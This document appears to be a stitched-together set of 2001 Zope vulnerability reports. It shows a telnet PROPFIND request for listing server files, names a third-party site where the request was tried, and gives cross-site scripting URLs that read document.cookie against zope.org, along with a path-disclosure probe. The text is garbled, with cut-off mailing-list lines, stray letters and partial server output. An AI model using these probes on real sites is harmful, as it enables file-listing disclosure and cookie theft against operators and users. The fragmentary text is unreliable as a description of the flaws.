Vulnerability: attacking can get file list and directory
Tested on Win32 platform
Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
< list files and directory >
This tested on my site:
security.instock.ru 8080
___
Zope-Dev maillist - [EMAIL P
Example:
http://www.zope.org/Documentation/alert(document.domain)
http://www.zope.org/lalalalalalert(document.domain)
http://www.zope.org/alert(document.cookie)
For example, an attacker might post a message like
Hello message board. This is a message.
malicious code
Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
C